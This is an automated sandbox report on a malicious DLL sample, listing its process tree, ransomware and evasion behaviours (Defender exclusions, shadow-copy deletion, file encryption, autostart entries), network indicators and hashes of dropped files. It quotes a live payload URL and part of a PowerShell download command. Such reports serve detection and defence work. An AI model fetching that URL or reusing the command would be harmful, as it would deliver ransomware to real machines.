2 other processes 16->37 process6 signatures7 119 Adds a directory exclusion to Windows Defender 20->119 39 powershell.exe 23 20->39         started        121 Suspicious powershell command line found 23->121 123 Uses ping.exe to sleep 23->123 125 Uses ping.exe to check the status of other devices and networks 23->125 42 rundll32.exe 23->42         started        44 powershell.exe 15 15 25->44         started        55 2 other processes 27->55 47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        57 2 other processes 33->57 51 conhost.exe 37->51         started        53 conhost.exe 37->53         started        process8 dnsIp9 127 Loading BitLocker PowerShell Module 39->127 129 Powershell drops PE file 39->129 59 t5y6t5.exe 4 1001 39->59         started        63 conhost.exe 39->63         started        131 Adds a directory exclusion to Windows Defender 42->131 65 cmd.exe 42->65         started        67 cmd.exe 42->67         started        69 cmd.exe 42->69         started        109 fiatie.top 103.253.43.248, 443, 49734, 49735 TELE-ASTeleAsiaLimitedHK Hong Kong 44->109 signatures10 process11 file12 99 C:\Users\user\AppData\...\.metadata-v2, DOS 59->99 dropped 101 C:\...\7e03a685-c52e-4810-b494-0f433b33ac49, COM 59->101 dropped 103 C:\Users\user\Desktop\...\BNAGMGSPLO.xlsx, data 59->103 dropped 105 110 other files (106 malicious) 59->105 dropped 141 Deletes shadow drive data (may be related to ransomware) 59->141 143 May encrypt documents and pictures (Ransomware) 59->143 145 Overwrites Mozilla Firefox settings 59->145 151 3 other signatures 59->151 71 cmd.exe 59->71         started        74 WMIC.exe 59->74         started        76 WMIC.exe 59->76         started        147 Adds a directory exclusion to Windows Defender 65->147 78 powershell.exe 65->78         started        80 conhost.exe 65->80         started        149 Suspicious powershell command line found 67->149 82 powershell.exe 16 67->82         started        85 conhost.exe 67->85         started        signatures13 process14 file15 133 Uses ping.exe to sleep 71->133 87 conhost.exe 71->87         started        89 PING.EXE 71->89         started        91 conhost.exe 74->91         started        93 conhost.exe 76->93         started        135 Loading BitLocker PowerShell Module 78->135 95 WmiPrvSE.exe 78->95         started        97 C:\Users\user\AppData\Local\Temp\t5y6t5.exe, PE32 82->97 dropped signatures16 process17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
R7bv9d6gTH.dll28%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
https://fiatie.top/seti/cnost5ty6y.cpl100%Avira URL Cloudmalware
https://fiatie.top/seti/cnost5ty6y.cpl-Outfile$env:tmp100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
fiatie.top
103.253.43.248
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://fiatie.top/seti/cnost5ty6y.cpltrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.ebay.co.uk/3870112724rsegmnoittet-es.sqlite.19.drfalse
      high
      https://www.avito.ru/3870112724rsegmnoittet-es.sqlite.19.drfalse
        high
        https://github.com/mozilla/webcompat-reporterextensions.json.19.drfalse
          high
          https://www.amazon.co.uk/3870112724rsegmnoittet-es.sqlite.19.drfalse
            high
            https://www.ebay.de/3870112724rsegmnoittet-es.sqlite.19.drfalse
              high
              https://screenshots.firefox.com/extensions.json.19.drfalse
                high
                https://digify.com/a/#/access/loginloaddll32.exe, 00000000.00000002.2323020137.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, R7bv9d6gTH.dllfalse
                  high
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiprefs.js.19.drfalse
                    high
                    https://www.amazon.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                      high
                      https://www.ctrip.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                        high
                        https://www.google.com/search?client=firefox-b-d&q=4cb4db2a-ee68-4128-8ff4-f04bdc710c24.19.dr, b6281059-34c6-49d8-97c7-24de33b104ab.19.dr, 7e03a685-c52e-4810-b494-0f433b33ac49.19.drfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.19.drfalse
                            high
                            http://ocsp.rootca1.amazontrust.com0:cert9.db.19.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.wykop.pl/3870112724rsegmnoittet-es.sqlite.19.drfalse
                              high
                              https://twitter.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                high
                                https://www.leboncoin.fr/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                  high
                                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgprefs.js.19.drfalse
                                    high
                                    https://digify.com/a/#/access/logincmdR7bv9d6gTH.dllfalse
                                      high
                                      https://fiatie.top/seti/cnost5ty6y.cpl-Outfile$env:tmpcmd.exe, 0000000B.00000002.2319859211.0000000003170000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2333239112.00000000035C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.sqlite.19.drfalse
                                        high
                                        https://www.olx.pl/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                          high
                                          https://www.youtube.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                            high
                                            https://allegro.pl/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                              high
                                              https://support.mozilla.org/products/firefoxfavicons.sqlite.19.drfalse
                                                high
                                                https://MD8.mozilla.org/1/m3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                  high
                                                  https://account.bellmedia.c3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                    high
                                                    https://weibo.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                      high
                                                      https://www.bbc.co.uk/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                        high
                                                        https://login.microsoftonline.com3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                          high
                                                          https://bugzilla.mo3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                            high
                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtplaces.sqlite.19.drfalse
                                                              high
                                                              https://www.ifeng.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                high
                                                                https://www.zhihu.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                  high
                                                                  http://x1.c.lencr.org/0cert9.db.19.drfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0cert9.db.19.drfalse
                                                                      high
                                                                      https://www.amazon.fr/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                        high
                                                                        https://www.msn.com3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                          high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.19.drfalse
                                                                            high
                                                                            https://www.google.com/complete/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                              high
                                                                              https://support.mozilla.orgplaces.sqlite.19.drfalse
                                                                                high
                                                                                https://www.reddit.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                                  high
                                                                                  https://www.amazon.ca/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                                    high
                                                                                    https://www.google.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                                      high
                                                                                      https://www.iqiyi.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                                        high
                                                                                        https://www.amazon.de/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                                          high
                                                                                          https://www.baidu.com/3870112724rsegmnoittet-es.sqlite.19.drfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            103.253.43.248
                                                                                            fiatie.topHong Kong
                                                                                            133398TELE-ASTeleAsiaLimitedHKtrue
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1568876
                                                                                            Start date and time:2024-12-05 05:25:06 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 7m 18s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:52
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:R7bv9d6gTH.dll
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:a99d226d4adb07e5b2199a45775b4d7f.dll
                                                                                            Detection:MAL
                                                                                            Classification:mal100.rans.phis.troj.spyw.evad.winDLL@69/685@1/1
                                                                                            EGA Information:Failed
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 0
                                                                                            • Number of non-executed functions: 0
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .dll
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            05:26:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            05:26:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            05:26:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                            23:26:09API Interceptor103x Sleep call for process: powershell.exe modified
                                                                                            23:26:17API Interceptor2x Sleep call for process: loaddll32.exe modified
                                                                                            23:26:18API Interceptor1x Sleep call for process: rundll32.exe modified
                                                                                            23:26:24API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                            23:26:59API Interceptor4x Sleep call for process: t5y6t5.exe modified
                                                                                            No context
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELE-ASTeleAsiaLimitedHKhttp://9089357365.com/Get hashmaliciousPhisherBrowse
                                                                                            • 45.125.65.213
                                                                                            UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                            • 45.125.66.18
                                                                                            UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                            • 45.125.66.18
                                                                                            1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                                                            • 45.125.66.18
                                                                                            V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                            • 45.125.66.18
                                                                                            V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                            • 45.125.66.18
                                                                                            https://57365oo.cc/Get hashmaliciousPhisherBrowse
                                                                                            • 45.125.65.213
                                                                                            zte.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                            • 45.125.66.78
                                                                                            Kxk45K3cAx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 45.125.66.223
                                                                                            NVu6VqOPCN.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 45.125.66.223
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0ePatch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                            • 103.253.43.248
                                                                                            RuntimeBroker.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                            • 103.253.43.248
                                                                                            Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            EHak.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            EHak.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.253.43.248
                                                                                            No context
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):436
                                                                                            Entropy (8bit):7.4754391807428435
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:rtoVA1ooHLStC7qzW5WOEtfCoaIUrNnWzXn:rtoVA1oMO5WxEKIyn6
                                                                                            MD5:500B042506BD9F0F796C817E21672BFF
                                                                                            SHA1:DFE128C5409807EB8035B39E35A8ACFE64E9081C
                                                                                            SHA-256:D2543DF3217F531778C8DF87E99D3DFDF2426D0A29EF6F1ACE2758CB58F4BDE9
                                                                                            SHA-512:7ACD5977B251FE4A8500985F3F4007F56C6D7E1FA23848C32462C9BBF3674C7D2825A66EC5D0C9A5386BD5D853A40BCF98E3AA45E1A923DE503AB4BBF9373230
                                                                                            Malicious:false
                                                                                            Preview:(.I......4..|`.......Rb...N$.i.91.........D..f.....05r5.....2.q.t......5......^'...dQs.X...* s..90.d.c-c|g....l.Mna.....G..f.>x....D...&... _....T...8.1.1.....XL..-:.uzH.c.te.S..........HX...gs1..v.........jR.{{....1...$....j..9.h;..O..zA.oB.E!c<.gNz.}.......F...d\......3.T...0....6.........O..Vg.q ......ahn.9.oA8..D`@j......p...].%...Vs.;.uzbZ.{s,S..h....%..c..gdw67.]d..LQ...}.;..I.V.......jz.H.....p..O0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1200
                                                                                            Entropy (8bit):7.847155794962282
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:KnYKEiF+XjEUZ8mkiZ6Mh1Ht26SuBOY7yEu9VG7sm0cXgX82:NuF+QUGmkiZBDNbynVlmlXqv
                                                                                            MD5:8B3154341739AE2F80F5DEC98EAFF249
                                                                                            SHA1:D426A11832629A4FEC6DDEB00B1FB776BCE2ECBF
                                                                                            SHA-256:EF137192259642800933F4047EA2BBC96953042BD1D5B800382E490770358D08
                                                                                            SHA-512:F0812BE47DF0184A50D34EA535F0E278D609572B42D3B0CFB7A259024AFC869BBF1B45B1560F53D5B9C3374BDB9C3345C6C6B091C85B4B4B068D7BDC214CD1FA
                                                                                            Malicious:false
                                                                                            Preview:.._.jX....~Q............^.w:R.'.......{.9rf........J.z7.K...v\.&..o...k_.L.:.q7...u.$..u.d...!....,re.k..).......+.k..+...V.`<...G..P.H|..j.a\.pL..B.R....q.......X...,.9.'..h!l.&...^>\..#PK...e..........i!...u.S..X.AC.........u.....s..g.`[.6..!.....*.~.,5 O.....iM@.....5....{.[..Y..`...h....+E..?...*.@...Wh..,(......s?.?.3.X0...*.b....H............c..{Q.]...T.c.@.>C.G.'.n.....E..c.|...T]..x*.k.Qi.....y....K.f....-...@. H|zw..u..Dx....G.}...d0.DU...q....O....l...p...5..~..k..D..ki.'..].v...kyN.a..)...oP.\2....9(y..W...F@57_+cko..+..?....9&..u?{..............d.2R.w].&^.]..,.#.R..3...|.k.z2....O.?....+y.$.$....kM..l4<..kC..-.+8'.%,..d.q.,...;.$..V.t8T!r?;Qy."..Eyby..[.4E\.[.I.NYq......BR..........a~..q`....7.H.....,.z....n..1...C&....Th.y.<...,.?....6.....#..c*8'.cWp.,......2.....P...g<..B...J.j...j..m..4.".t.G......gp...qHD...J......%3.dQhm..r&..|.8.R...@>.9.^a'.=>..x.4.2.....[}2.v3..+...F.@....B.h$Z.(...W..~.sC:.T.>.(........,d.._.>....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):65802
                                                                                            Entropy (8bit):3.4014070549794893
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:XrX8H5jOaeT8WRlSjPWxz4luNutcLUIMyzt9e0eOMymgb:L8H5USjGtr
                                                                                            MD5:2546390FFC671C1F21D5CB8E246F11BD
                                                                                            SHA1:3A4D5128B834E2FD0447E45532C1D59F621670C8
                                                                                            SHA-256:01E231EB247373994DCB79141363D2F388230F9F1C465D09C8B9350AB6DE6BA2
                                                                                            SHA-512:54CC1EEB2A2C996AA4E8017F92CE34E53AD6672DA889834FC65D728F43B7F8D5F677CA9D99BA7F3AABE18BB9616CA43D85CF3900AB8F2CBED36C8510D7F45A51
                                                                                            Malicious:false
                                                                                            Preview:c..g~..mS...h..V......=.'W.t.r.w.@.`....N..f.\q...@.H...z~.w*.f\.\)....c........._...=.R0k.Z.Y.7.....".......$....~.r..0.ro.a..#..}...+..^..|bu....I..2..sA.)...u....=....X...=g..<...L..v....(C.:}.o.........'...at.VqA..hD:2.D.@.i.m.A.*Z....#..........')f....'......P&.]...9..w#k.V=.8_. E.(w..o..Xk=.@+fWG. -z&....u...(|..2....".`........b...`C...I.Y'......$..&.)!tj.-d4".OX]...z..j$.G...D?<.........q......"....X_.....SxH......Vr.2b..Gz`....?M...u..[...fC..;.%.}........q9`N..A.1]T~.3.......;.....b..g......4..n]. h.eM....uT.i.7..F_..p......./...8......*@.E.....l.b_..d.%.`w..}[..-.....z......[.1.%.R.".y*:C.N..............x.Ub..C..@]t.....p...!.-v...0C..b...G.z.L...&.x[...W..F8+#.G/.k.c@.B..3=..k...#..dS`D...gq...(...@...8.c.g.W.%./...8|..8...........Q.......1m.`X..[..."....C.p...:..]...#.L..%.qr.k.....v..dca3.;......i.....1.....cd2nv>...O...I.....N.w.q....5.^..7..W.Z..!<O\:...Hy...`@.?b`vN...i.E..[....X....B.+Z..(@nU.Y.I.x.%.O...U...%|.Ni..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):20746
                                                                                            Entropy (8bit):4.753541268884374
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:eeN9CPbERgfAj2f5RlIEgA5gtt2DWCz0389zcg3Xa7b:eiCTAyl5z0M9zNQ
                                                                                            MD5:3CFA5A4374696728924AD2FBD6AAD819
                                                                                            SHA1:091BE19A708A3C5143EEA0D5E9E25CA4E183D73B
                                                                                            SHA-256:623C82BE7D77A8C64BC88F5E98DD35A62350F10BB2DC45BE3CF06916F02A8E32
                                                                                            SHA-512:951111A9BAA13EE3496FE011DEB46699A4D3AEE72D4E107263F345FBDA24A1D879B79BFACAAF1A79877E24B79122A8A005BB3DDAF5C0DEAB2881B24769F258D5
                                                                                            Malicious:false
                                                                                            Preview:..y.B..N..G..YDx...yl..Akwf.....Kg..<.P..S./.o.!S4...E{c.:..1.Kq.....$fd.w....IB[..tY".......x..qH........h(.*.p..).?...&.....[.Q...*..+..c..=Q..K..ui..cc'....H.$^GI)"9..PHV..x...x.d.`...7....l...m........T.N..w..0.D.d..O....|C.7...8ROnb.4^..\....X.B..jb.....waU..1(1y..=....q.M.a...... ......Q....v...m...p.S...G{.".#.T.s.k..."j.K.Sn...Y.o...!P/)^..<......_+.....z.|..n...m[....P~...U...(..&.Ee{z.1...p....)2.4.9..$d....4}.ic9..."....3.;6+.B\...{...JL.,.|a9a.C;_....%.i.4.t.Y}.:.8.}...)4E..N.v.E@...O..|....s..a............|....nM.&I.sEr....3.q.........p3*..^.v.*.}m:I.$.@q.bRGd4nl.'.mV%.FT.~.&.^.....d..p....Q5..U..N.O1.z..G....Z.7.!....L......s.(.....h.3....y.5....?.J......viz,.G.th...P9W.a.[#...BVOS.A..M.L.T....e.aK/.../H...b...s...LJy..pR..$..>...T6..-.U!i.c..^9...\..@f*4.:.&.?FQ....w.R..A..8..8.'.|..........eZ..v...........,...m.._;..WI.'..[L.u...z..qh..a.......V(.......l.>.U[.,....^./...)..kJ6..Z...p...s}...6.=..~.Y<m.=.......}.'B.@.<
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):262410
                                                                                            Entropy (8bit):3.1599382313194804
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:1ty0biBRf/kjFbUJ5zkBijAXU6fMo0BSYKLQty:jy1BRf/O0zzANUoGP8Qty
                                                                                            MD5:7B21C15D60B461E14F0EC01838A87A75
                                                                                            SHA1:8F0B1136E1F0519DF001C8D98FBB176A9990E300
                                                                                            SHA-256:76D09E246DC1738E65C28D7FDA41BCEAF70D93234106683111ED15790BE086C6
                                                                                            SHA-512:13310F9FB21CA2C5937482D60EA0159E56EDCB98B185C5DD3D30918EFE378BB6105568EB3F7580D663629D5CE19DF84554583F783D805EDFCB3C47330A5AB21F
                                                                                            Malicious:false
                                                                                            Preview:.e..|.u..~(-..W...u?.Q9.5`v...Z.v6...h...U.h1..dr-.W../V!."2.zW.8#......5.v..0?]]..........0...J&...SH..?...P.z..M+4Yf..x.?..]NT4F`.&e....@.+..E....I<...p...m.[........8X....h.....xfSY.C.*.Fb....Hd...*.?.A......et%.R..t.[.|^....'C/"...by5..YI...:.2....d.L^.]....+...WOPJ.2Hu.8pc.B3.........W..G..0.jW..(.T.p.zh..J....5.............B....Sj..j....#C..t.*....V.._..\.HZ.~.............r&..L......ln.....|...\9..r.G/@P..(Q..._..s..*^a.y.}...|..7..q.jY...8.7......G...8..._.=z5..\^-<.oI.:hVmtY...P.y0.......PjGtg.5._.=.%..u.W...RG\e.b.....;W...5.V...t.3..y...f...H.S../]8W..Z..H;T~.=.-%....y__..6.X.,...}......1.e.ysx..{.......S.......Q..[g..2f.K|.x.!.6.............Y......_...3....WG....x..$.......]2N."....;|.>........}.b0........u../....q.W.y.5F....P.....F&..X.*HP.C....f.....&...]..e..........]..$.=?t}f...nUxf.(v6.$.|.L)...<.y......C....[.8.}W.....v.....U!......h..8*.c.NQ..#.1o....z[.V.n..... ..V8.3...@..Yd./..k...^LSH.'.w....t....Z?n."3..k.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):65802
                                                                                            Entropy (8bit):1.0509171643534747
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:8XxMmhqowx0ToiiWfoOeLxNmcCBchpcmZX/Fe7tprRk7VG7Vkak7tLrRk7VG7VX/:TmQLCToiiWf2mKpcmZXGDRkseaWxRksF
                                                                                            MD5:784E6AA648FC613F0C73C95A84201FED
                                                                                            SHA1:380E9BBF8C713F54F4423D302CA4BFF9BB741681
                                                                                            SHA-256:82128DF7AF07CC0440E5C25B394322E09BF8878961C368E04EE356227572FEE6
                                                                                            SHA-512:900D3D96885F4BB751A5BA53E430B29C00B87A54323785E92F5BDD6902151841FF966214C527FAA127299A07EEFCB08DF19DB7952F3B23C0E9CBF37E89E3A706
                                                                                            Malicious:false
                                                                                            Preview:H\`&....?V2..Uk".p.r..X. ^..\o....r.....l.q...}...U...&.e.%~!D...X.t/.Z...2....ci.fn.......X......_6<.+..41.E..F...!-.6N..kV..s...<..R.|E...$.n/.K..7,#a.$.d.....K...=.d.H.Z-.6k]W....Gn..T._^R.\~C.V..Eg..dJ.G...F.aN8...>...:..\.n.H.s.zC6.G$PzL87f4...~...7xVg....,.C.HA..|.~.7...TZ.%r..Is.#.4.%.ec.I...P...C.......+....bzo..h,6..~.a.Q.y...].........eY..f....Q.....@.........<f.?..Ie...;.....6..e.Go...L.#.iU....v.......A|J..'..BS...Xj.....Y[DxR..?..vf.....F,1Ud..N[.K.).o...vz~...a...On..oA..H....V..82~.6\..@.?!..(.j...7....h..{Y.%..+1#q..z].Lf.....J..>.p........A....*..`./?u.#.e......n...I4.~..|..1C..~.u.$..Z.g..,....&jh.. .....Utw.i8...?..p?...sD7j.8..M..........M1q.%U.....,1..c$......%.p.g.x..6...w)Z..GJ..c.T..AlO.........\.~..i...|4.....`L.S.\..+<._.p...^..o.X[,H...8o.+..,.l.xc3:.r`z.......N.4q..)qj.~....X....N../.'mu.-......\...O.S......j..R..uhX.Ih...[......t..&....@....~....r.H#C........zS..3.c....).....s.._j...^.. .B..Dd...2ySjv.!.,.'.r
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):524554
                                                                                            Entropy (8bit):0.13488697024611124
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Kp2MJuffIHIYeY3siJx7n6kcboj6uJ5Fz8XSplWEStAqksBQRtS17RO3:KNgwo/Y37xukcbI5FhLctVfQAO3
                                                                                            MD5:4A5BBCDE7F486FDA18EB3860D8A5CE0E
                                                                                            SHA1:C8950DC4B610B75C284336F36C6CC75333BF6C03
                                                                                            SHA-256:51B48B434A8786D6E093A9469380F1821DE3B51B443FE60EC24E4D19B9ECC13C
                                                                                            SHA-512:D3A53F4E71EC743F88F00982E77E441934F6F882BE8DDC70E4FFBB346F68D15AD64166B6D03056FD2F5D38C7F2C7EB1A69CEAEA118E7588033F3650A662E3E9E
                                                                                            Malicious:false
                                                                                            Preview:H.y..r.N. js.,AJ........C..^.q........;.K.q..G..y..L4c....8.G.S{..Xl......z..i...pG.\.y..bi.......Md....)F-.mA..Z'P.&.Bc3..D&Ho.w.Qn..]lzj..^."........I.h.(.....c.{._0F-.*.bDlrc...r20h.........R..v...i.2|x.)<".`.-P.....3..}a.....bD..4%4+.O.j..hP`D...Q.Z.e.%.>.Jb..n..!.....8.-e.rX...X.E...ur"..0=......MfJ/W29h....v..........E....c.<a.{.cfu1z9..A.o.k..\.F.b^..^.Q..e..{`.o7..&./.5NTB..H..}=c.+=;....&.n.Z..}|...3......E8..G.(..el+..["X...UX,%......B../4%H.O.rP..pj..).J-.-..F,...x+..V...WH...q.p/..%.?.....P[.[s....NCvUz....>~...R.K.@....'.z..$......&,.*..G...z-GK:..J...c)..-. ..$v._..,.%........).#[...F...>....a......O..7..E.......f...KLd.B........s.;..HL..2.4.5..=..I.s.5.5:..n:.N"..<..c...W.w...&.]..%.........w...\..&D.i...@pX...F....PX.6..N.{...D..H...:^.c...]..E......\e.Ff.}u....<V..9.!...i.".e..,..i...Kn5...wv.+O..........blQ.*-<E..$!~.$... /.._.A%25T.....GK.a....v!r.."...Pd..-..!.x......g.RYZ..@4.l.)....N.(..W..X.."y..7....Q*'5...}./.....`^O
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):524554
                                                                                            Entropy (8bit):0.13502543675525597
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:9Stqb63Vg6GR88fmrkEcM50IOje5zcX+hTUlUWahrKbM7s2:98s6FhG+mukE7S6WaDB
                                                                                            MD5:A4DA6148B46961524C5E7BBC67C7F35C
                                                                                            SHA1:2A75F83AAFACF0137ED0D42F9DA6C7027C8F4D10
                                                                                            SHA-256:74438437F02A4B3B02E2A903D0A777EFDF6B6DBD8BB35933C433D62582C61D65
                                                                                            SHA-512:BE69BBE366C857914936CEC091CD8CD7BE4471F7D9B35DECFED8E5A303C2D150A100E63BF3F9EE21365F3A9125A921D4DE010E6907893EDE2821CA99E30ACB41
                                                                                            Malicious:false
